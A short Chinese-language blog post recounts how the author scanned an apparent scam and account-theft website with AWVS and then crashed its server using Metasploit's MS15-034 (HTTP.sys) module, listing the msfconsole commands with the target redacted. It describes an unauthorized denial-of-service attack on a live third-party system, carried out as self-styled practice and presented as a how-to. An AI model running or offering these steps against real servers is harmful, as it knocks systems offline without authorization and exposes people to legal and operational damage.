利用MS15-034使盗号诈骗网站宕机

作者 by Tokeii / 2020-08-23 / 暂无评论 / 2194 个足迹

最近在找一些盗号网站、诈骗网站练手,于是我发现了一个网站,所谓的刷QB
打开AWVS扫一扫
发现一个经常遇到的严重漏洞,这个比较常见,解决方法百度~,以下是攻击过程
tu1.png
HTTP.sys 中的漏洞可能允许远程执行代码
打开kali-msf
这个漏洞对应的编号是MS15-034
我们search一波
tu2.png
设置好参数后,run一波,提示成功,服务器down掉了
3.png
tu4.png
相关代码

search ms15-034
use 0
set rhost www.******.com
set threads 10
set targeturi /*****
run

独特见解